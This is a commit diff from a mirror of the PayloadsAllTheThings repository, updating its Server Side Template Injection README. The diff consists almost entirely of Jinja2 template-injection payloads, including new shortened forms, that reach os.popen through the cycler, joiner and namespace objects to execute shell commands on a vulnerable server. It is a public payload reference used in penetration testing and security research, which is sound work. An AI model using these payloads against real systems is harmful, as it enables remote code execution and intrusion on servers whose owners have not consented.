Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 08:54:40 +01:00
Code Issues Projects Releases Wiki Activity

Update README.md

Browse source
This commit is contained in:
Podalirius 2021-09-18 20:03:12 +02:00 committed by GitHub
parent d2f63406cd
commit b5699ecf08
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
Server Side Template Injection/README.md
View file

@ -503,14 +503,20 @@ These payloads are context-free, and do not require anything, except being in a
```python ```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
```
```python
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
``` ```
We can use these shorter payloads (this is the shorter payloads known yet):
```python ```python
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} {{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
``` ```
Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/ Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/